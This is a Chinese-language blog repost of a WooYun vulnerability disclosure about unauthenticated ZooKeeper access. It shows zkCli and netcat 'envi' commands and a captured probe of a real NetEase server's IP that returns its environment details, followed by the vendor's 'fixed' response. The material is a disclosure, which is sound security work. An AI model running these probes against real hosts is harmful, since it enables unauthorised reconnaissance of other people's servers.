ZooKeeper未授权漏洞

ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,它是集群的管理者,监视着集群中各个节点的状态根据节点提交的反馈进行下一步合理操作。最终,将简单易用的接口和性能高效、功能稳定的系统提供给用户,默认端口2181。

利用:

连接:

./zkCli.sh -server ip:port

  

获取系统环境

echo envi|nc ip port

乌云网易案例:

x1.png







oot@kali:~# echo envi |nc 60.191.83.13 2181

Environment:

zookeeper.version=3.4.6-1569965, built on 02/20/2014 09:09 GMT

host.name=localhost

java.version=1.7.0_79

java.vendor=Oracle Corporation

java.home=/opt/jdk1.7.0_79/jre

java.class.path=/root/zookeeper-3.4.6/bin/../build/classes:/root/zookeeper-3.4.6/bin/../build/lib/*.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-log4j12-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-api-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/netty-3.7.0.Final.jar:/root/zookeeper-3.4.6/bin/../lib/log4j-1.2.16.jar:/root/zookeeper-3.4.6/bin/../lib/jline-0.9.94.jar:/root/zookeeper-3.4.6/bin/../zookeeper-3.4.6.jar:/root/zookeeper-3.4.6/bin/../src/java/lib/*.jar:/root/zookeeper-3.4.6/bin/../conf:

java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib

java.io.tmpdir=/tmp

java.compiler=<NA>

os.name=Linux

os.arch=amd64

os.version=3.2.0-4-amd64

user.name=root

user.home=/root

user.dir=/root/zookeeper-3.4.6/bin



扫描二维码关注公众号,回复: 7685047 查看本文章

x2.png



漏洞证明:

 

修复方案:

 

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2016-04-11 10:21

厂商回复:

漏洞已修复,感谢您对网易的关注!

最新状态:

暂无

猜你喜欢

转载自www.cnblogs.com/junsec/p/11763476.html